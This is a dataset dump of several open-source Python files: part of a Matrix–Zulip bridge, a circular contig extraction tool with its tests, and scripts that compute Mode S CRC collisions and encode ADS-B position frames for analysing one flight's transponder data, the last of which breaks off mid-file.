self.email, api_key=self.api_key, site=self.site
)
if not self.connected:
self.connected = True
await self.save()
# awaiting above allows disconnect to happen in-between
if self.zulip is None:
logging.debug("Zulip disconnected")
return
self.disconnect = False
self.connected_at = asyncio.get_running_loop().time()
self.profile = self.zulip.get_profile()
self.server = self.zulip.get_server_settings()
self.zulip_handler = ZulipEventHandler(self)
                # Start Zulip event listener
asyncio.get_running_loop().run_in_executor(
None,
functools.partial(
self.zulip.call_on_each_event,
lambda event: self.zulip_handler.on_event( # pylint: disable=unnecessary-lambda
event
),
apply_markdown=True,
),
)
asyncio.ensure_future(self._on_connect())
self.send_notice(f"Connected to {self.site}")
asyncio.ensure_future(
self.serv.push_bridge_state(
BridgeStateEvent.CONNECTED, remote_id=self.name
)
)
return
except Exception as e:
self.send_notice(f"Failed to connect: {str(e)}")
if self.backoff < 1800:
self.backoff = self.backoff * 2
if self.backoff < 5:
self.backoff = 5
self.send_notice(f"Retrying in {self.backoff} seconds...")
self.backoff_task = asyncio.ensure_future(asyncio.sleep(self.backoff))
try:
await self.backoff_task
except asyncio.CancelledError:
break
finally:
self.backoff_task = None
self.send_notice("Connection aborted.")
async def _on_connect(self):
await self._get_users()
await self._login_zulip_puppets()
await self._sync_all_room_members()
await self._sync_permissions()
await self.backfill_messages()
async def _get_users(self):
result = self.zulip.get_members()
if result["result"] != "success":
raise Exception(f"Could not get Zulip users: {result['msg']}")
for user in result["members"]:
self.zulip_users[user["user_id"]] = user
if not user["is_active"]:
self.deactivated_users.add(str(user["user_id"]))
async def _login_zulip_puppets(self):
for user_id, login in self.zulip_puppet_login.items():
await self.login_zulip_puppet(user_id, login["email"], login["api_key"])
async def login_zulip_puppet(self, user_id: "UserID", email: str, api_key: str):
"""Create a Zulip puppet
Args:
user_id (str): MXID
email (str): Zulip account email
api_key (str): Zulip account API key
"""
client = zulip.Client(email, api_key=api_key, site=self.site)
self.zulip_puppets[user_id] = client
profile = client.get_profile()
if "user_id" not in profile:
return
self.zulip_puppet_user_mxid[str(profile["user_id"])] = user_id
# Create event queue for receiving DMs
asyncio.get_running_loop().run_in_executor(
None,
functools.partial(
client.call_on_each_event,
lambda event: self.on_puppet_event( # pylint: disable=unnecessary-lambda
event
),
apply_markdown=True,
event_types=["message"], # required for narrow
narrow=[["is", "dm"]],
),
)
await self.save()
return profile
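    # Illustrative call shape (hypothetical values) - normally driven from the
    # stored `zulip_puppet_login` config via _login_zulip_puppets:
    #   await org.login_zulip_puppet(
    #       "@alice:example.com", "[email protected]", "zulip-api-key"
    #   )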
def delete_zulip_puppet(self, user_id: "UserID"):
if user_id in self.zulip_puppets:
del self.zulip_puppets[user_id]
if user_id in self.zulip_puppet_user_mxid.inv:
del self.zulip_puppet_user_mxid.inv[user_id]
if user_id in self.zulip_puppet_login:
del self.zulip_puppet_login[user_id]
async def _sync_permissions(self):
# Owner should have the highest permissions (after bot)
self.permissions[self.serv.config["owner"]] = 99
# arbitrary translations of Zulip roles to Matrix permissions
role_permission_mapping = {
100: 95, # owner
200: 80, # administrator
300: 50, # moderator
400: 0, # member
600: 0, # guest
}
for zulip_user_id, user in self.zulip_users.items():
user_id = self.serv.get_mxid_from_zulip_user_id(self, zulip_user_id)
power_level = role_permission_mapping[user["role"]]
self.permissions[user_id] = power_level
rooms = set(self.rooms.values())
rooms.add(self)
rooms.add(self.space)
        logging.info(f"Syncing permissions across {len(rooms)} rooms")
for room in rooms:
if not isinstance(room, (StreamRoom, OrganizationRoom, SpaceRoom)):
continue
logging.debug(f"Synching permissions in {self.name} - {room.id}")
await room.sync_permissions(self.permissions)
async def _sync_all_room_members(self):
result = self.zulip.get_subscriptions(request={"include_subscribers": True})
if result["result"] != "success":
logging.error(
f"Getting subscriptions for {self.name} failed! Message: {result['msg']}"
)
return
streams = result["subscriptions"]
for stream in streams:
room = self.rooms.get(stream["stream_id"])
if not room or not isinstance(room, StreamRoom):
continue
asyncio.ensure_future(room.sync_zulip_members(stream["subscribers"]))
def get_zulip_user(self, user_id: "ZulipUserID", update_cache: bool = False):
if update_cache or user_id not in self.zulip_users:
result = self.zulip.get_user_by_id(user_id)
if result["result"] != "success":
return None
self.zulip_users[user_id] = result["user"]
return self.zulip_users[user_id]
def get_zulip_user_id_from_mxid(self, mxid: "UserID") -> Optional["ZulipUserID"]:
if self.serv.is_puppet(mxid):
ret = re.search(
rf"@{self.serv.puppet_prefix}{self.name.lower()}{self.serv.puppet_separator}(\d+):{self.serv.server_name}",
mxid,
)
return ret.group(1)
elif mxid in self.zulip_puppet_user_mxid.inv:
return self.zulip_puppet_user_mxid.inv[mxid]
else:
return None
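    # Example of the puppet MXID shape the regex above parses (placeholder
    # values): with puppet_prefix "_zulip_", organization "myorg" and separator
    # "_", "@_zulip_myorg_42:example.com" yields ZulipUserID "42".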
async def backfill_messages(self):
for room in self.rooms.values():
if not isinstance(room, StreamRoom):
continue
if room.max_backfill_amount == 0:
continue
await room.backfill_messages()
for room in self.direct_rooms.values():
await room.backfill_messages()
def on_puppet_event(self, event: dict) -> None:
if event["type"] != "message":
return
self.dm_message(event["message"])
def dm_message(self, message: dict) -> None:
event = {"type": "_dm_message", "message": message}
self._queue.enqueue(event)
async def _flush_event(self, event: dict):
if event["type"] == "_dm_message":
await self.zulip_handler.handle_dm_message(event["message"])
else:
return await super()._flush_event(event)
| 30,920 | Python | .py | 751 | 30.338216 | 123 | 0.589586 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,592 | types.py | GearKite_MatrixZulipBridge/matrixzulipbridge/types.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
from typing import NewType
from mautrix.types import EventID
ZulipTopicName = NewType("ZulipTopicName", str)
ThreadEventID = NewType("ThreadEventID", EventID)
ZulipUserID = NewType("ZulipUserID", str)
ZulipMessageID = NewType("ZulipMessageID", str)
ZulipStreamID = NewType("ZulipStreamID", int)
| 1,081 | Python | .py | 24 | 43.958333 | 74 | 0.790521 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,593 | circular_contig_extractor.py | rrwick_Circular-Contig-Extractor/circular_contig_extractor.py | #!/usr/bin/env python3
"""
Copyright 2024 Ryan Wick ([email protected])
https://github.com/rrwick/Circular-Contig-Extractor
This program is free software: you can redistribute it and/or modify it under the terms of the GNU
General Public License as published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not,
see <https://www.gnu.org/licenses/>.
"""
import argparse
import collections
import gzip
import os
import pathlib
import re
import shutil
import subprocess
import sys
import tempfile
__version__ = '0.1.0'
def get_arguments(args):
parser = MyParser(description='Circular Contig Extractor', add_help=False,
formatter_class=MyHelpFormatter)
positional_args = parser.add_argument_group('Positional arguments')
positional_args.add_argument('input_gfa', type=pathlib.Path,
help='Input assembly graph in GFA format')
clustering_args = parser.add_argument_group('Contig size settings')
clustering_args.add_argument('--min', type=int, default=None,
help='Minimum contig size in bp (default: no minimum size)')
clustering_args.add_argument('--max', type=int, default=None,
help='Maximum contig size in bp (default: no maximum size)')
clustering_args = parser.add_argument_group('Query settings')
clustering_args.add_argument('--query', type=pathlib.Path, default=None,
help='Query reference sequence(s) in FASTA format (default: none)')
clustering_args.add_argument('--mash', type=float, default=0.1,
help='Maximum Mash distance to query sequence')
other_args = parser.add_argument_group('Other')
other_args.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS,
help='Show this help message and exit')
other_args.add_argument('--version', action='version',
version='Circular Contig Extractor v' + __version__,
help="Show program's version number and exit")
args = parser.parse_args(args)
check_args(args)
return args
def main(args=None):
args = get_arguments(args)
contigs, links = load_gfa(args.input_gfa)
contigs = find_circular_contigs(contigs, links)
quit_if_no_contigs_left(contigs)
contigs = trim_overlaps(contigs)
contigs = filter_by_size(contigs, args.min, args.max)
quit_if_no_contigs_left(contigs)
contigs = filter_by_query(contigs, args.query, args.mash)
quit_if_no_contigs_left(contigs)
output_contigs(contigs)
def quit_if_no_contigs_left(contigs):
if not contigs:
sys.exit()
def check_args(args):
if args.min is not None and args.min <= 0:
sys.exit('Error: --min must be greater than 0')
if args.max is not None and args.max <= 0:
sys.exit('Error: --max must be greater than 0')
if args.min is not None and args.max is not None and args.max < args.min:
sys.exit('Error: --max must be greater than or equal to --min')
if args.mash < 0:
sys.exit('Error: --mash must be greater than or equal to 0.0')
if args.mash >= 1:
sys.exit('Error: --mash must be less than 1.0')
if args.query is not None:
check_file_exists(args.query)
query_seqs = list(iterate_fasta(args.query))
if not query_seqs:
sys.exit(f'Error: {args.query} contains no sequences')
def load_gfa(filename):
print(f'\nLoading {filename}:', file=sys.stderr)
contigs, links = [], []
with get_open_func(filename)(filename, 'rt') as gfa_file:
for line in gfa_file:
parts = line.rstrip('\n').split('\t')
if parts[0] == 'S':
contigs.append(parts[1:3])
if parts[0] == 'L':
links.append(parts[1:6])
print(f' {len(contigs)} contig{"" if len(contigs) == 1 else "s"}', file=sys.stderr)
print(f' {len(links)} link{"" if len(links) == 1 else "s"}', file=sys.stderr)
return contigs, links
def find_circular_contigs(contigs, links):
print(f'\nFinding circular contigs:', file=sys.stderr)
circular_links = {}
for seg_a, strand_a, seg_b, strand_b, cigar in links:
if seg_a == seg_b and strand_a == strand_b:
circular_links[seg_a] = cigar
for seg_a, strand_a, seg_b, strand_b, _ in links:
if seg_a != seg_b or strand_a != strand_b:
circular_links.pop(seg_a, None)
circular_links.pop(seg_b, None)
circular_contigs = []
for name, seq in contigs:
if name in circular_links:
circular_contigs.append((name, seq, circular_links[name]))
print(f' {name}: {len(seq):,} bp', file=sys.stderr)
if not circular_contigs:
print(' no circular contigs found\n', file=sys.stderr)
return circular_contigs
def trim_overlaps(contigs):
print(f'\nTrimming overlaps:', file=sys.stderr)
trimmed_contigs = []
for name, seq, cigar in contigs:
print(f' {name}: ', file=sys.stderr, end='')
overlap = get_overlap_from_cigar(cigar)
if overlap is None:
print(f'cannot determine overlap', file=sys.stderr)
elif overlap == 0:
print(f'no overlap', file=sys.stderr)
else:
print(f'trimming {overlap} bp', file=sys.stderr)
trimmed_contigs.append((name, trim_seq(seq, overlap)))
return trimmed_contigs
def get_overlap_from_cigar(cigar):
match = re.match(r'^(\d+)M$', cigar)
return int(match.group(1)) if match else None
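# For example, a GFA self-link CIGAR of '55M' denotes a 55 bp overlap, so
# get_overlap_from_cigar('55M') returns 55, while multi-operation CIGARs such
# as '2M1D4M' (or '*') return None and the contig is left untrimmed.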
def trim_seq(seq, trim_amount):
if trim_amount is None or trim_amount == 0:
return seq
else:
return seq[:-trim_amount]
def filter_by_size(contigs, min_size, max_size):
if min_size is None and max_size is None:
return contigs
print(f'\nFiltering by size:', file=sys.stderr)
if min_size is not None:
contigs = [s for s in contigs if len(s[1]) >= min_size]
if max_size is not None:
contigs = [s for s in contigs if len(s[1]) <= max_size]
for name, seq in contigs:
print(f' {name}: {len(seq):,} bp', file=sys.stderr)
if not contigs:
print(' no contigs satisfy size parameters\n', file=sys.stderr)
return contigs
def filter_by_query(contigs, query_filename, mash_threshold):
if query_filename is None:
return contigs
print(f'\nFiltering by query sequence(s):', file=sys.stderr)
mash_distances = get_all_mash_distances(contigs, query_filename)
closest_distances = {contig_name: sorted(distances)[0]
for contig_name, distances in mash_distances.items()}
matching_contigs = []
for name, seq in contigs:
closest_dist, closest_query = closest_distances[name]
if closest_dist <= mash_threshold:
matching_contigs.append((name, seq))
print(f' {name}: {closest_dist:.5f} Mash distance to {closest_query}', file=sys.stderr)
if not matching_contigs:
print(' no contigs match query sequence(s)\n', file=sys.stderr)
return matching_contigs
def get_all_mash_distances(contigs, query_filename):
mash_distances = collections.defaultdict(list)
with tempfile.TemporaryDirectory() as temp_dir:
query_fasta = pathlib.Path(temp_dir) / 'query.fasta'
contig_fasta = pathlib.Path(temp_dir) / 'contig.fasta'
for query_name, query_seq in iterate_fasta(query_filename):
write_fasta(query_name, query_seq, query_fasta)
for contig_name, contig_seq in contigs:
write_fasta(contig_name, contig_seq, contig_fasta)
dist = get_mash_distance(query_fasta, contig_fasta)
mash_distances[contig_name].append((dist, query_name))
return mash_distances
def write_fasta(name, seq, filename):
with open(filename, 'wt') as f:
f.write(f'>{name}\n')
f.write(f'{seq}\n')
def get_mash_distance(fasta_a, fasta_b):
mash_command = ['mash', 'dist', fasta_a, fasta_b]
distances = []
p = subprocess.Popen(mash_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
stderr = p.stderr.read().strip()
for line in p.stdout:
parts = line.split('\t')
distance = float(parts[2])
distances.append(distance)
if len(distances) != 1:
sys.exit(f'Error: mash dist did not run successfully:\n{stderr}')
assert len(distances) == 1
return distances[0]
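# Note: this shells out to the `mash` binary, which must be installed and on
# PATH. Each `mash dist` output line is tab-separated (reference-ID, query-ID,
# distance, p-value, shared-hashes), hence the distance is read from parts[2].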
def output_contigs(contigs):
print(f'\nOutputting contigs:', file=sys.stderr)
for name, seq in contigs:
print(f' {name}: {len(seq):,} bp', file=sys.stderr)
print(f'>{name}\n{seq}')
print('', file=sys.stderr)
def iterate_fasta(filename):
"""
Takes a FASTA file as input and yields the contents as (name, seq) tuples.
"""
with get_open_func(filename)(filename, 'rt') as fasta_file:
name = ''
sequence = []
for line in fasta_file:
line = line.strip()
if not line:
continue
if line[0] == '>': # Header line = start of new contig
if name:
name_parts = name.split(maxsplit=1)
contig_name = name_parts[0]
yield contig_name, ''.join(sequence)
sequence = []
name = line[1:]
else:
sequence.append(line.upper())
if name:
name_parts = name.split(maxsplit=1)
contig_name = name_parts[0]
yield contig_name, ''.join(sequence)
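# Typical use: `for name, seq in iterate_fasta('contigs.fasta.gz'): ...` -
# gzipped input is handled transparently via get_open_func.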
def check_file_exists(filename):
if filename.is_dir():
sys.exit(f'Error: {filename} is a directory, not a file')
if not filename.is_file():
sys.exit(f'Error: {filename} does not exist')
def get_compression_type(filename):
"""
Attempts to guess the compression (if any) on a file using the first few bytes.
http://stackoverflow.com/questions/13044562
"""
magic_dict = {'gz': (b'\x1f', b'\x8b', b'\x08'),
'bz2': (b'\x42', b'\x5a', b'\x68'),
'zip': (b'\x50', b'\x4b', b'\x03', b'\x04')}
max_len = max(len(x) for x in magic_dict)
unknown_file = open(str(filename), 'rb')
file_start = unknown_file.read(max_len)
unknown_file.close()
compression_type = 'plain'
for file_type, magic_bytes in magic_dict.items():
if file_start.startswith(magic_bytes):
compression_type = file_type
if compression_type == 'bz2':
sys.exit('Error: cannot use bzip2 format - use gzip instead')
if compression_type == 'zip':
sys.exit('Error: cannot use zip format - use gzip instead')
return compression_type
def get_open_func(filename):
if get_compression_type(filename) == 'gz':
return gzip.open
else: # plain text
return open
END_FORMATTING = '\033[0m'
BOLD = '\033[1m'
DIM = '\033[2m'
class MyParser(argparse.ArgumentParser):
"""
This subclass of ArgumentParser changes the error messages, such that if the script is run with
no other arguments, it will display the help text. If there is a different error, it will give
the normal response (usage and error).
"""
def error(self, message):
if len(sys.argv) == 1: # if no arguments were given.
self.print_help(file=sys.stderr)
sys.exit(1)
else:
super().error(message)
class MyHelpFormatter(argparse.HelpFormatter):
def __init__(self, prog):
terminal_width = shutil.get_terminal_size().columns
os.environ['COLUMNS'] = str(terminal_width)
max_help_position = min(max(24, terminal_width // 3), 40)
self.colours = get_colours_from_tput()
super().__init__(prog, max_help_position=max_help_position)
def _get_help_string(self, action):
"""
Override this function to add default values, but only when 'default' is not already in the
help text.
"""
help_text = action.help
if action.default != argparse.SUPPRESS and action.default is not None:
if 'default: DEFAULT' in help_text:
help_text = help_text.replace('default: DEFAULT', f'default: {action.default}')
return help_text
def start_section(self, heading):
"""
Override this method to add bold underlining to section headers.
"""
if self.colours > 1:
heading = BOLD + heading + END_FORMATTING
super().start_section(heading)
def _format_action(self, action):
"""
Override this method to make help descriptions dim.
"""
help_position = min(self._action_max_length + 2, self._max_help_position)
help_width = self._width - help_position
action_width = help_position - self._current_indent - 2
action_header = self._format_action_invocation(action)
if not action.help:
tup = self._current_indent, '', action_header
action_header = '%*s%s\n' % tup
indent_first = 0
elif len(action_header) <= action_width:
tup = self._current_indent, '', action_width, action_header
action_header = '%*s%-*s ' % tup
indent_first = 0
else:
tup = self._current_indent, '', action_header
action_header = '%*s%s\n' % tup
indent_first = help_position
parts = [action_header]
if action.help:
help_text = self._expand_help(action)
help_lines = self._split_lines(help_text, help_width)
first_line = help_lines[0]
if self.colours > 8:
first_line = DIM + first_line + END_FORMATTING
parts.append('%*s%s\n' % (indent_first, '', first_line))
for line in help_lines[1:]:
if self.colours > 8:
line = DIM + line + END_FORMATTING
parts.append('%*s%s\n' % (help_position, '', line))
elif not action_header.endswith('\n'):
parts.append('\n')
for subaction in self._iter_indented_subactions(action):
parts.append(self._format_action(subaction))
return self._join_parts(parts)
def get_colours_from_tput():
try:
return int(subprocess.check_output(['tput', 'colors']).decode().strip())
except (ValueError, subprocess.CalledProcessError, FileNotFoundError, AttributeError):
return 1
if __name__ == '__main__':
main()
| 14,931 | Python | .py | 334 | 36.389222 | 100 | 0.625568 | rrwick/Circular-Contig-Extractor | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,594 | test_circular_contig_extractor.py | rrwick_Circular-Contig-Extractor/test/test_circular_contig_extractor.py | """
This module contains some tests for Circular Contig Extractor. To run them, execute
`python3 -m pytest` from the root Circular Contig Extractor directory.
Copyright 2024 Ryan Wick ([email protected])
https://github.com/rrwick/Circular-Contig-Extractor
This program is free software: you can redistribute it and/or modify it under the terms of the GNU
General Public License as published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not,
see <https://www.gnu.org/licenses/>.
"""
import circular_contig_extractor
import collections
import glob
import gzip
import os
import pathlib
import pytest
import tempfile
def file_dir():
return pathlib.Path(__file__).resolve().parent / 'files'
def test_compression_type_1():
filename = file_dir() / 'uncompressed'
compression_type = circular_contig_extractor.get_compression_type(filename)
assert compression_type == 'plain'
open_func = circular_contig_extractor.get_open_func(filename)
assert open_func == open
def test_compression_type_2():
filename = file_dir() / 'gzipped'
compression_type = circular_contig_extractor.get_compression_type(filename)
assert compression_type == 'gz'
open_func = circular_contig_extractor.get_open_func(filename)
assert open_func == gzip.open
def test_compression_type_3():
filename = file_dir() / 'bzip2ed'
with pytest.raises(SystemExit) as exit_message:
circular_contig_extractor.get_compression_type(filename)
assert 'cannot use bzip2' in str(exit_message.value)
def test_compression_type_4():
filename = file_dir() / 'zipped'
with pytest.raises(SystemExit) as exit_message:
circular_contig_extractor.get_compression_type(filename)
assert 'cannot use zip' in str(exit_message.value)
def test_help_1():
with pytest.raises(SystemExit) as sysexit:
circular_contig_extractor.main(['--help'])
def test_help_2():
with pytest.raises(SystemExit) as sysexit:
circular_contig_extractor.main([])
def test_check_args():
Args = collections.namedtuple('Args', ['in_gfa', 'min', 'max', 'query', 'mash'])
check_args = circular_contig_extractor.check_args
check_args(Args(in_gfa='in', min=None, max=None, query=None, mash=0.1))
check_args(Args(in_gfa='in', min=100, max=None, query=None, mash=0.1))
check_args(Args(in_gfa='in', min=None, max=100, query=None, mash=0.1))
check_args(Args(in_gfa='in', min=None, max=None, query=None, mash=0.9))
with pytest.raises(SystemExit):
check_args(Args(in_gfa='in', min=-100, max=None, query=None, mash=0.1))
with pytest.raises(SystemExit):
check_args(Args(in_gfa='in', min=None, max=-100, query=None, mash=0.1))
with pytest.raises(SystemExit):
check_args(Args(in_gfa='in', min=1000, max=100, query=None, mash=0.1))
with pytest.raises(SystemExit):
check_args(Args(in_gfa='in', min=None, max=None, query=None, mash=2.0))
with pytest.raises(SystemExit):
check_args(Args(in_gfa='in', min=None, max=None, query=None, mash=-0.1))
with pytest.raises(SystemExit):
check_args(Args(in_gfa='in', min=None, max=None, query=pathlib.Path('bad'), mash=0.5))
def test_check_file_exists():
good = file_dir() / 'uncompressed'
bad = file_dir() / 'not_a_file'
directory = pathlib.Path(__file__).resolve().parent
circular_contig_extractor.check_file_exists(good)
with pytest.raises(SystemExit):
circular_contig_extractor.check_file_exists(bad)
with pytest.raises(SystemExit):
circular_contig_extractor.check_file_exists(directory)
def test_load_gfa():
filename = file_dir() / 'graph_1.gfa'
contigs, links = circular_contig_extractor.load_gfa(filename)
assert len(contigs) == 3
assert len(links) == 3
def test_find_circular_contigs_1():
filename = file_dir() / 'graph_1.gfa'
contigs, links = circular_contig_extractor.load_gfa(filename)
circular_contigs = circular_contig_extractor.find_circular_contigs(contigs, links)
assert len(circular_contigs) == 1
assert circular_contigs[0][0] == '2'
def test_find_circular_contigs_2():
filename = file_dir() / 'graph_2.gfa'
contigs, links = circular_contig_extractor.load_gfa(filename)
circular_contigs = circular_contig_extractor.find_circular_contigs(contigs, links)
assert len(circular_contigs) == 0
def test_trim_overlaps():
contigs = [('1', 'ACGATCAGCACT', '0M'),
('2', 'ACGATCAGCACT', '5M'),
('3', 'ACGATCAGCACT', '*')]
trimmed_contigs = circular_contig_extractor.trim_overlaps(contigs)
assert trimmed_contigs == [('1', 'ACGATCAGCACT'), ('2', 'ACGATCA'), ('3', 'ACGATCAGCACT')]
def test_get_overlap_from_cigar():
assert circular_contig_extractor.get_overlap_from_cigar('0M') == 0
assert circular_contig_extractor.get_overlap_from_cigar('123M') == 123
assert circular_contig_extractor.get_overlap_from_cigar('abc') is None
assert circular_contig_extractor.get_overlap_from_cigar('2M1D4M') is None
assert circular_contig_extractor.get_overlap_from_cigar('') is None
def test_trim_seq():
assert circular_contig_extractor.trim_seq('ACACGACTACG', None) == 'ACACGACTACG'
assert circular_contig_extractor.trim_seq('ACACGACTACG', 0) == 'ACACGACTACG'
assert circular_contig_extractor.trim_seq('ACACGACTACG', 1) == 'ACACGACTAC'
assert circular_contig_extractor.trim_seq('ACACGACTACG', 2) == 'ACACGACTA'
assert circular_contig_extractor.trim_seq('ACACGACTACG', 3) == 'ACACGACT'
assert circular_contig_extractor.trim_seq('ACACGACTACG', 4) == 'ACACGAC'
assert circular_contig_extractor.trim_seq('ACACGACTACG', 5) == 'ACACGA'
def test_filter_by_size():
contigs = [('1', 'ACGATC'), ('2', 'ACGATCAGC'), ('3', 'ACGATCAGCACT')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, None, None)
assert filtered_contigs == [('1', 'ACGATC'), ('2', 'ACGATCAGC'), ('3', 'ACGATCAGCACT')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, 0, 100)
assert filtered_contigs == [('1', 'ACGATC'), ('2', 'ACGATCAGC'), ('3', 'ACGATCAGCACT')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, 8, 10)
assert filtered_contigs == [('2', 'ACGATCAGC')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, 9, 9)
assert filtered_contigs == [('2', 'ACGATCAGC')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, None, 9)
assert filtered_contigs == [('1', 'ACGATC'), ('2', 'ACGATCAGC')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, 9, None)
assert filtered_contigs == [('2', 'ACGATCAGC'), ('3', 'ACGATCAGCACT')]
filtered_contigs = circular_contig_extractor.filter_by_size(contigs, 100, 200)
assert filtered_contigs == []
def test_filter_by_query_1():
graph_filename = file_dir() / 'graph_3.gfa'
query_filename = file_dir() / 'query.fasta'
contigs, _ = circular_contig_extractor.load_gfa(graph_filename)
matching_contigs = circular_contig_extractor.filter_by_query(contigs, query_filename, 0.1)
assert len(matching_contigs) == 1
assert matching_contigs[0][0] == '2'
def test_filter_by_query_2():
graph_filename = file_dir() / 'graph_3.gfa'
query_filename = file_dir() / 'query.fasta'
contigs, _ = circular_contig_extractor.load_gfa(graph_filename)
matching_contigs = circular_contig_extractor.filter_by_query(contigs, query_filename, 0.00001)
assert len(matching_contigs) == 0
def test_get_mash_distance():
fasta = file_dir() / 'query.fasta'
empty = file_dir() / 'empty_file'
assert circular_contig_extractor.get_mash_distance(fasta, fasta) == 0.0
with pytest.raises(SystemExit):
assert circular_contig_extractor.get_mash_distance(empty, empty)
def test_write_fasta():
with tempfile.TemporaryDirectory() as temp_dir:
fasta = pathlib.Path(temp_dir) / 'temp.fasta'
circular_contig_extractor.write_fasta('a', 'ACGACTACGATC', fasta)
result = list(circular_contig_extractor.iterate_fasta(fasta))
assert result == [('a', 'ACGACTACGATC')]
| 8,507 | Python | .py | 157 | 49.401274 | 98 | 0.708644 | rrwick/Circular-Contig-Extractor | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,595 | crc_collision.py | ErnestThePoet_MU5735-ADSB-Reveal/crc_collision.py | import pyModeS as pms
# When calculating CRC, AP should be all zeros
df5_2101_template = "00101_{0}_0001001110000_000000000000000000000000"
df5_0463_template = "00101_{0}_0010101010110_000000000000000000000000"
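# Mode S DF5 (surveillance identity reply) layout, 56 bits in total:
#   DF(5) | FS(3) | DR(5) | UM(6) | ID(13) | AP(24)
# The {0} placeholder takes the 14 FS+DR+UM bits; the fixed 13-bit ID
# fields presumably encode squawks 2101 and 0463 (going by the variable
# names), and the trailing 24 zeros stand in for the AP field.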
collision_values: dict[str, list[str]] = {}
fs_dr_um_valid_values: list[str] = []
for fs in map(lambda x: bin(x)[2:].zfill(3), range(1 << 3)):
for dr in ("00000", "00001", "00100", "00101"):
for um in map(lambda x: bin(x)[2:].zfill(6), range(1 << 6)):
fs_dr_um_valid_values.append(fs + dr + um)
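# Outer search space: 8 FS x 4 DR x 64 UM = 2048 candidate frames; the
# inner loop below sweeps all 2**14 = 16384 FS+DR+UM patterns for the
# 0463 frame, i.e. roughly 33.6M CRC comparisons in total.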
for fs_dr_um_2101 in fs_dr_um_valid_values:
df5_2101_template_hex = pms.bin2hex(df5_2101_template.format(fs_dr_um_2101))
crc_df5_2101 = pms.crc(df5_2101_template_hex)
for fs_dr_um_0463 in map(lambda x: bin(x)[2:].zfill(14), range(1 << 14)):
df5_0463_template_hex = pms.bin2hex(df5_0463_template.format(fs_dr_um_0463))
crc_df5_0463 = pms.crc(df5_0463_template_hex)
if crc_df5_0463 == crc_df5_2101:
if fs_dr_um_2101 in collision_values:
collision_values[fs_dr_um_2101].append(fs_dr_um_0463)
else:
collision_values[fs_dr_um_2101] = [fs_dr_um_0463]
if len(collision_values) == 0:
print("No collision")
else:
for fs_dr_um_2101 in collision_values:
print(f"Collisions with 2101 where FS,DR,UM={fs_dr_um_2101}:")
for fs_dr_um_0463 in collision_values[fs_dr_um_2101]:
print(f" {fs_dr_um_0463}")
| 1,456 | Python | .py | 28 | 45.285714 | 84 | 0.644366 | ErnestThePoet/MU5735-ADSB-Reveal | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,596 | airborne_position_msg_drop_test.py | ErnestThePoet_MU5735-ADSB-Reveal/airborne_position_msg_drop_test.py | import math
from geopy import distance
import pyModeS as pms
def cpr_mod(a: float, b: float):
res = a % b
if res < 0:
res += b
return res
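# Note: in Python, a % b is already non-negative when b > 0, so the
# correction branch above never fires; it is kept to mirror the MOD
# definition in the CPR pseudo-code, where % may return negative values.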
def generate_adsb_sequence(positions: list[tuple[float, float]]):
MODES_TEMPLATE = f"10001_101_{pms.hex2bin('780DB8')}_{{0}}_000000000000000000000000"
ADSB_TEMPLATE = "01011_00_0_100101110100_0_{0}_{1}_{2}"
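    # MODES_TEMPLATE is a DF17 frame: DF(5)=10001 (17), CA(3)=101, the
    # ICAO address 780DB8 (24 bits), a 56-bit ME field ({0}) and a 24-bit
    # parity placeholder replaced with the real CRC below. ADSB_TEMPLATE
    # is the ME field of an airborne position report: TC(5)=01011 (type
    # code 11), SS(2), NICsb(1), a fixed 12-bit altitude code, T(1), the
    # CPR format flag F ({0}), then 17-bit CPR latitude ({1}) and
    # longitude ({2}).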
even = True
sequence: list[str] = []
for lat, lon in positions:
i = 0 if even else 1
d_lat = 360 / (60 - i)
yz = math.floor(131072 * cpr_mod(lat, d_lat) / d_lat + 0.5)
r_lat = d_lat * (yz / 131072 + math.floor(lat / d_lat))
d_lon = 360 if pms.cprNL(r_lat) - i == 0 else 360 / (pms.cprNL(r_lat) - i)
xz = math.floor(131072 * cpr_mod(lon, d_lon) / d_lon + 0.5)
yz = cpr_mod(yz, 131072)
xz = cpr_mod(xz, 131072)
modes = pms.bin2hex(MODES_TEMPLATE.format(ADSB_TEMPLATE.format(
i, bin(int(yz))[2:].zfill(17), bin(int(xz))[2:].zfill(17))))
modes = modes[:-6] + hex(pms.crc(modes))[2:].upper().zfill(6)
sequence.append(modes)
even = not even
return sequence
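# A global CPR decode needs one even and one odd frame, which is why the
# generator alternates the format flag. The fixes below appear to sample
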